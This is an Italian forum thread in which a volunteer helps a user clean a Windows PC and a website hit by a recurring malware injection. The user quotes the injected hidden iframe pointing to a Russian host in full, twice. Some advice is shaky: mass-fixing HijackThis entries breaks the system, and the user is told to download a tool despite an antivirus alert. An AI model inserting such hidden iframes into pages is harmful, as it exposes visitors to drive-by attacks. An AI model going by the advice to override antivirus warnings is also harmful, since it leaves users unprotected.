| Precedente :: Successivo |
| Autore |
Messaggio |
Sante62
Dio maturo
Registrato: 27/06/07 17:55
Messaggi: 3477
Residenza: Floridia
|
 Inviato: 02 Ott 2009 22:58 Oggetto: |
 |
|
Finalmente sono sparite quelle voci. Ma non voglio cantare vittoria troppo presto.
| bluegard14 ha scritto: |
una domanda.. quando lancio hijackthis mi trova molte voci selezionabili.. devo eliminarle? fixarle? |
Vuoi dire se le devi selezionare tutte? Ovviamente no.
Avvia HJT, seleziona queste righe, clicca poi su fix checked:
| Citazione: | O2 - BHO: Supporto di collegamento per Adobe PDF Reader - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Programmi\File comuni\Adobe\Acrobat\ActiveX\AcroIEHelper.dll
O2 - BHO: RealPlayer Download and Record Plugin for Internet Explorer - {3049C3E9-B461-4BC5-8870-4C09146192CA} - C:\Program Files\Real\RealPlayer\rpbrowserrecordplugin.dll
O2 - BHO: (no name) - {5C255C8A-E604-49b4-9D64-90988571CECB} - (no file)
O2 - BHO: Windows Live Sign-in Helper - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Programmi\File comuni\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
O2 - BHO: Google Toolbar Helper - {AA58ED58-01DD-4d91-8333-CF10577473F7} - C:\Programmi\Google\Google Toolbar\GoogleToolbar_32.dll
O2 - BHO: Google Toolbar Notifier BHO - {AF69DE43-7D58-4638-B6FA-CE66B5AD205D} C:\Programmi\Google\GoogleToolbarNotifier\5.2.4204.1700\swg.dll
O2 - BHO: Google Dictionary Compression sdch - {C84D72FE-E17D-4195-BB24-76C02E2E7C4E} - C:\Programmi\Google\Google Toolbar\Component\fastsearch_B7C5AC242193BB3E.dll
O2 - BHO: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Programmi\Java\jre6\bin\jp2ssv.dll
O2 - BHO: JQSIEStartDetectorImpl - {E7E6F031-17CE-4C07-BC86-EABFE594F69C} -
C:\Programmi\Java\jre6\lib\deploy\jqs\ie\jqs_plugin.dll
O3 - Toolbar: Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Programmi\Google\Google Toolbar\GoogleToolbar_32.dll
O4 - HKLM\..\Run: [PCMService] "C:\Programmi\CyberLink\PowerCinema\PCMService.exe"
O4 - HKLM\..\Run: [Malwarebytes Anti-Malware (reboot)] "C:\Programmi\Malwarebytes' Anti-Malware\mbam.exe" /runcleanupscript
O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Programmi\Java\jre6\bin\jusched.exe"
O4 - HKLM\..\Run: [Jet Detection] C:\Programmi\Creative\SBAudigy\PROGRAM\ADGJDet.exe
O4 - HKLM\..\Run: [PCSuiteTrayApplication] C:\PROGRA~1\Nokia\NOKIAP~1\LAUNCH~1.EXE -onlytray
O4 - HKLM\..\Run: [Adobe Reader Speed Launcher] "C:\Programmi\Adobe\Reader 8.0\Reader\Reader_sl.exe"
O4 - HKLM\..\Run: [Motive SmartBridge] C:\PROGRA~1\ALICET~1\SMARTB~1\MotiveSB.exe
O4 - HKLM\..\Run: [UpdReg] C:\WINDOWS\Updreg.exe
O4 - HKLM\..\Run: [NeroFilterCheck] C:\WINDOWS\system32\NeroCheck.exe
O4 - HKLM\..\Run: [CTStartup] C:\Programmi\Creative\SBAudigy\Program\CTEaxSpl.EXE /run
O4 - HKCU\..\Run: [PcSync] C:\Programmi\Nokia\Nokia PC Suite 6\PcSync2.exe /NoDialog
O4 - HKCU\..\Run: [swg] "C:\Programmi\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe" |
Riavvia il PC.
Elimina manualmente questi:
| Citazione: | c:\windows\Tasks\Google Software Updater.job
c:\windows\Tasks\Microsoft_Hardware_Launch_vVX1000_exe.job |
La cartella Tasks in genere è nascosta, quindi eventualmente abilita tale funzione.
Collegati nuovamente a Kaspersky online scanner e procedi con la scansione estesa del PC. |
|
| Top |
|
 |
bluegard14
Eroe
Registrato: 30/09/09 12:35
Messaggi: 41
|
| Inviato: 03 Ott 2009 00:12 Oggetto: |
|
|
allora devo informarti che il fix di quelle voci su hijackthis ha fatto un po di casino..
il SO si bloccava da tutte le parti!
Ho anche provato a ripristinare i file fixati ma dopo il riavvio l'errore è rimasto quindi ho dovuto di nuovo rilanciare il backup del so.. domattina mi rimetto in pari fino al tuo ultimo post ( ma non ricancellerò quei file ) 
notte e grazie di tutto... a domani |
|
| Top |
|
|
bluegard14
Eroe
Registrato: 30/09/09 12:35
Messaggi: 41
|
|
| Top |
|
|
bluegard14
Eroe
Registrato: 30/09/09 12:35
Messaggi: 41
|
| Inviato: 03 Ott 2009 09:02 Oggetto: |
|
|
ecco anche il log di Kaspersky
Kaspersky.html |
|
| Top |
|
|
Sante62
Dio maturo
Registrato: 27/06/07 17:55
Messaggi: 3477
Residenza: Floridia
|
| Inviato: 03 Ott 2009 10:34 Oggetto: |
|
|
Devo scusarmi, perchè non avevo fatto caso che HJT si trovava in D:\.
Invece mettilo in C:\, o dove hai installato il S.O. e la maggior parte dei programmi e comunque non in cartelle temp o desktop.
Fixa quelle righe un pò alla volta, riavvia e ne fixi altre.
E' necessario perchè sono troppe e inutili; ti portano via anche risorse.
Poi, cancella manualmente ciò che ha trovato Kasper:
| Citazione: | C:\Documents and Settings\Fabri\Impostazioni locali\Dati applicazioni\Microsoft\Windows Live Mail\Live (centr 746\Posta eliminata\31CF3063-00000034.eml
C:\Documents and Settings\Fabri\Impostazioni locali\Dati applicazioni\Microsoft\Windows Live Mail\Live \Posta in arrivo\46454D29-000001BB.eml Infected: not-a-virus:PSWTool.Win32.Messen.bh
C:\Documents and Settings\Fabri\Impostazioni locali\Dati applicazioni\Microsoft\Windows Live Mail\Storage Folders\Elementi re 8be\08-02-2009 f4f\494A0677-00000001.eml
C:\Documents and Settings\Fabri\Impostazioni locali\Dati applicazioni\Microsoft\Windows Live Mail\Tin (viper3869)\Inbox\4FD21125-000006EE.eml D:\Programmi\prog divx\divxcodecpro502\DivXPro502GAINBundle.zip
D:\Programmi\prog divx\DivXPro502GAINBundle\DivXPro502GAINBundle.exe
D:\Programmi\prog divx\DivXPro502GAINBundle.zip
D:\Varie\D Chiara\Programmi\eMule\Uninstall.exe
D:\Varie\MIRC4cp\mirc4.exe |
Fammi sapere come è andata. |
|
| Top |
|
|
bluegard14
Eroe
Registrato: 30/09/09 12:35
Messaggi: 41
|
|
| Top |
|
|
bluegard14
Eroe
Registrato: 30/09/09 12:35
Messaggi: 41
|
| Inviato: 03 Ott 2009 10:50 Oggetto: |
|
|
Fatto adesso il pc è pulito..
Ma poco fa mi sono accorto che il codice Iframe che appare nella homepage si è rifatto vivo di nuovo! 
<body bgcolor="#000000" background="eleganti0060.jpg" text="#000000" link="#FF0000" vlink="#FF0000" alink="#FF0000"><div style="display:none">zziznrdodxjqmkoteruubwwggbtnzte<iframe width=872 height=315 src="http://onetherlife.ru:8080/index.php" ></iframe></div>
ieri sera avevo anche provato ad eliminare tutti i javascript presenti nella pagina tipo il contatore di visite phpstats e altri script tipo il pulsante aggiungi a preferiti ecc...
Ma stamattina il codice maligno era nuovamente presente!
Quello che non capisco è da dove cavolo si insinua questo codice.. cosa è che lo richiama!!! Adesso la pagina è pulita solo immagini e testo!
|
|
| Top |
|
|
bluegard14
Eroe
Registrato: 30/09/09 12:35
Messaggi: 41
|
| Inviato: 03 Ott 2009 11:53 Oggetto: |
|
|
| bluegard14 ha scritto: | Fatto adesso il pc è pulito..
Ma poco fa mi sono accorto che il codice Iframe che appare nella homepage si è rifatto vivo di nuovo!
<body bgcolor="#000000" background="eleganti0060.jpg" text="#000000" link="#FF0000" vlink="#FF0000" alink="#FF0000"><div style="display:none">zziznrdodxjqmkoteruubwwggbtnzte<iframe width=872 height=315 src="http://onetherlife.ru:8080/index.php" ></iframe></div>
ieri sera avevo anche provato ad eliminare tutti i javascript presenti nella pagina tipo il contatore di visite phpstats e altri script tipo il pulsante aggiungi a preferiti ecc...
Ma stamattina il codice maligno era nuovamente presente!
Quello che non capisco è da dove cavolo si insinua questo codice.. cosa è che lo richiama!!! Adesso la pagina è pulita solo immagini e testo!
|
non esiste un programma che ispezioni il codice html per trovare codice maligno? |
|
| Top |
|
|
Sante62
Dio maturo
Registrato: 27/06/07 17:55
Messaggi: 3477
Residenza: Floridia
|
| Inviato: 03 Ott 2009 12:11 Oggetto: |
|
|
Sicuramente si insinua tramite qualche porta vulnerabile.
Proveremo un apposito tool.
Scarica Windows Worms Doors Cleaner va bene anche sul desktop.
Win 2000 / XP / 2003 server
* DCOM RPC (port 135)
* RPC Locator (port 445)
* NetBIOS (ports 137/138/139) M
* UPNP (port 5000)
* Messenger service (uses RPC/NetBIOS ports)
Non occorre installazione. Una volta scaricato, avvialo.
Vedrai sicuramente delle voci rosse. Cliccaci sopra per correggerle.
Una volta corrette tutte, riavvia il PC. Al riavvio, le voci dovrebbero essere tutte verdi. |
|
| Top |
|
|
bluegard14
Eroe
Registrato: 30/09/09 12:35
Messaggi: 41
|
| Inviato: 03 Ott 2009 12:27 Oggetto: |
|
|
| la pagina di Windows Worms Doors Cleaner credo l'abbiano modificata.. non mi fa scaricare il file |
|
| Top |
|
|
Sante62
Dio maturo
Registrato: 27/06/07 17:55
Messaggi: 3477
Residenza: Floridia
|
| Inviato: 03 Ott 2009 12:41 Oggetto: |
|
|
| Prova a scaricarlo da quì. |
|
| Top |
|
|
bluegard14
Eroe
Registrato: 30/09/09 12:35
Messaggi: 41
|
| Inviato: 03 Ott 2009 12:42 Oggetto: |
|
|
| da li l'antivirus si mette a suonare.. lo scarico lo stesso? |
|
| Top |
|
|
Sante62
Dio maturo
Registrato: 27/06/07 17:55
Messaggi: 3477
Residenza: Floridia
|
| Inviato: 03 Ott 2009 13:48 Oggetto: |
|
|
Ma non ce l'hai un pò troppo sensibile quest'antivirus?
Si, scaricalo lo stesso, ho provato anch'io e non c'è problema. |
|
| Top |
|
|
bluegard14
Eroe
Registrato: 30/09/09 12:35
Messaggi: 41
|
| Inviato: 03 Ott 2009 13:56 Oggetto: |
|
|
è avira antivir free
ok scarico |
|
| Top |
|
|
bluegard14
Eroe
Registrato: 30/09/09 12:35
Messaggi: 41
|
| Inviato: 03 Ott 2009 14:00 Oggetto: |
|
|
| allora ho dovuto disattivare l'antivirus perchè non mi fa vivere, ma all'avvio del programma non succede nulla.. proprio nulla, non si aprono popup o finestre con le voci rosse da correggere |
|
| Top |
|
|
Sante62
Dio maturo
Registrato: 27/06/07 17:55
Messaggi: 3477
Residenza: Floridia
|
| Inviato: 03 Ott 2009 14:11 Oggetto: |
|
|
La cosa a questo punto mi preoccupa.
Non ti appare prorio nulla? Se è così vuol dire che le porte potrebbero essere già "occupate". Ed è proprio quì il problema.
Vai su start->esegui e digita:
cmd
si apre una finestra mod dos;
dal prompt digita:
netstat -anovb
dai l'invio e aspetta che finisca;
quando ritorna il prompt, clicca col destro su un punto vuoto della schermata;
seleziona e copia il contenuto della schermata nel blocco note e caricalo quì con le solite modalità. |
|
| Top |
|
|
bluegard14
Eroe
Registrato: 30/09/09 12:35
Messaggi: 41
|
| Inviato: 03 Ott 2009 14:30 Oggetto: |
|
|
ti premetto che mi hai un po spaventato..
ecco qui il risultato:
cmd.txt |
|
| Top |
|
|
Sante62
Dio maturo
Registrato: 27/06/07 17:55
Messaggi: 3477
Residenza: Floridia
|
| Inviato: 03 Ott 2009 15:36 Oggetto: |
|
|
Vedo che queste porte sono occupate da processi di sistema, in alcune anche sconosciuti.
l'unica cosa che ti posso suggerire e tentare di riparare questi bug tramite Windows Update. Fai controllare in automatico gli aggiornamenti del tuo sistema, che sicuramente ce ne saranno da scaricare.
Se tutto va a buon fine, riprova con WWDC. |
|
| Top |
|
|
bluegard14
Eroe
Registrato: 30/09/09 12:35
Messaggi: 41
|
| Inviato: 03 Ott 2009 15:49 Oggetto: |
|
|
allora gli aggiornamenti automatici di windows update mi danno 0 aggiornamenti da fare..
"Non sono disponibili aggiornamenti a priorità alta per il computer. "
qualcuno mi ha consigliato di provare con Stopbadware
sai di cosa si tratta? oppure ci fermiamo qui? |
|
| Top |
|
|
Sante62
Dio maturo
Registrato: 27/06/07 17:55
Messaggi: 3477
Residenza: Floridia
|
| Inviato: 03 Ott 2009 16:11 Oggetto: |
 |
|
| bluegard14 ha scritto: |
qualcuno mi ha consigliato di provare con Stopbadware
sai di cosa si tratta? oppure ci fermiamo qui? |
Non conosco questo programma, ma comunque facciamo un tentativo con Dr Web Cureit, scaricalo e fai la scansione. Attenzione però al tuo antivirus.
Sono sempre convinto che il problema deriva da quelle porte. Fai sempre dei tentativi con WWDC, magari scaricandolo un altra volta. |
|
| Top |
|
|
|
FAQ
Cerca
Lista utenti
Gruppi
Registrati
Profilo
Messaggi privati
Log in
